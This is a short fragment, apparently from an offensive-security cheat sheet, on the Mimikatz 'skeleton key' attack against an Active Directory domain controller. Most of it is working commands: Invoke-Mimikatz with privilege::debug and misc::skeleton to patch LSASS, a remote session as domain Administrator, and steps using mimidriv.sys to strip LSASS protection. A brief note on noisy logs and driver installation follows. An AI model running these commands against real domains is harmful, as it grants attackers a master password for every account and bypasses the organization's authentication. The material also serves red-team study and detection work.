- Patches the DC’s LSASS process so that it allows access as any user with a single password.
- Publicly knows methods are not persistent across reboots.
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName domain-controller-fqdnEnter-PSSession -ComputerName domain-controller -credential domain\AdministratorIn case LSASS is running as a protected process, we can still use Skeleton key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC:
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton- Very noisy logs - Service installation (Kernel mode driver)
- Might cause issues with AD CS